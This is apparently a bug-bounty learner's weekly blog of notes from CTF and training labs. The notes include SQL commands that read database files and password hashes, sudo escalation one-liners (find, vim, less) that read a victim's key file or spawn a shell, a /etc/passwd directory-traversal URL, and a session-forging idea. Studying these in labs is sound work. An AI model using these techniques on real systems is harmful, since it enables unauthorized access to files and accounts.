This is a digest of things I have learned in Week #16 of 2020 on my journey of becoming a Bug Bounty Hunter. I just opened my notes and thought, f***! I have taken so many notes that past week. So, the sooner we get going the better. This is Part 7 of The Ethical Hacking Diaries!
Check this link to see all of the Ethical Hacking Diaries episodes!
https://www.youtube.com/watch?v=RRmM8KRDBPU
Hacker101 CTF
Below are things I have learned from playing Hacker101 CTF’s last week. I can’t recommend them enough.
Curl
curl -X GET http://35.190.155.168/b07fd435fe/page/edit/2
curl -X POST http://35.190.155.168/b07fd435fe/page/edit/2
Password Hash Types
Learned a bit of different password hash types and how to recognize them.
-
MD5 Hash: $1$
-
if the hash starts by $2$ or $2a$, Blowfish is used;
-
if the hash starts by $5$, SHA-256 is used;
-
if the hash starts by $6$, SHA-512 is used.
Pentesterlabs
Below you’ll find some stuff that I have learned while practicing on Pentesterlabs the past week. I went through a bunch of SQL exercises.
MySQL
show databases; use [DATABASE]; show tables; select * from [TABLE];
/var/lib/mysql/mysql/user.MYD
localhost root*8246FACFAA5BB9CFDCDEAEDA 6c732c6044b7 root 127.0.0.1 root root localhost debian-sys-maint*7B6D59ECDB7B791CF100CA46D0AD911082112351 15DA4067EAA55FBC
SELECT LOAD_FILE('/var/lib/mysql-files/key.txt') AS Result;
Postgresql
psql
\list
\c [DATABASE]
\d
SELECT * from users;
CREATE TABLE demo(t text); COPY demo from '[FILENAME]'; SELECT * FROM demo;
DROP TABLE demo;
SQLite3
sqlite3 [FILENAME]
.tables
SELECT * from users;
Puh, that was a lot of Database stuff! Let’s move on to something more exciting.
Privilege Escalation
I also learned a couple of things in regards to Privilege Escalation while doing some Pentesterlabs exercises. Most notably, exploiting sudo permissions to read/modify files from other users. I’ll walk you through a couple of them.
In regards to Privilege Escalation, make sure to check out GTFOBins. I will show you more about GTFOBins in the accompanying video on YouTube.
Below I show you a couple of possibilities on how to exploit sudo permissions to execute stuff as sudo with the low-priv user.
To find out which commands a user can run as sudo, you can check this by typing:
sudo -l
Example 1: User has sudo access to the find command
User has sudo permissions for /usr/bin/find
sudo -u victim find /home/victim -name key.txt
This allows you to find files, specifically the key.txt file of the victim using his sudo permissions.
Now we can also read the contents of the key.txt file
sudo -u victim find /home/victim -name key.txt -exec cat {} \;
Or even better, get a shell as the victim:
sudo -u victim find /home/victim -name key.txt -exec bash \;
Below are a couple of other permissions we could utilize to escalate privileges. Those are my mostly raw notes:
sudo -u victim vim /home/victim/key.txt
sudo -u victim vim :!/bin/bash
sudo -u victim less /victim/home/key.txt
sudo -u victim less /victim/home/key.txt
:!/bin/bash
This should give you a good idea of what the possibilities are in regards to Privilege Escalation. Hint: There are about 3 million more. All credits go to Pentesterlabs.
Portswigger Labs
I have learned a fair bit on Directory Traversal over at the awesome Labs of Portswigger Academy. All the information provided here comes with credit to Portswigger.
Directory Traversal
Directory Traversal can be used to access or modify files on a Webserver. Let’s say you have an image that is referred to by filename=218.png or something like this:
<img src="/loadImage?filename=218.png">
This loadImage URL takes in the filename parameter and returns the content of it. Obviously the image itself is stored somewhere in /var/www/images on the backend. That means, the application actually reads from this path:
/var/www/images/218.png
Because this particular app does not have any defenses against Directory Traversal, we can access other files on the server by modifying the URL path like so:
https://insecure-website.com/loadImage?filename=../../../etc/passwd
Which executes the following path on the backend:
/var/www/images/../../../etc/passwd
Hence, we can read the passwd file!
I found this exercise super interesting and I will test for that kind of thing every time from now on.
Cookies
As the final piece of this weeks blog, I learned something more about cookies, unfortunately, I do not recall where I learned it from, but here it is:
If you get the same session ID multiple times when logging in and out, there is a problem. If you log in from a cleaned-up browser, you should never get the same session ID twice! It’s worth checking which hash the Cookie ID uses in this case and then try to create a hash for the Admin user to bypass authentication.
Conclusion Week #16
As you can see, there were lots of things to be learned in Week #16. I enjoy the process a lot, I also enjoy sharing the progress in this Blog. You can see that there is so much to learn out there, it’s hard to keep it at times 🙂 See you back here next week for Week #17!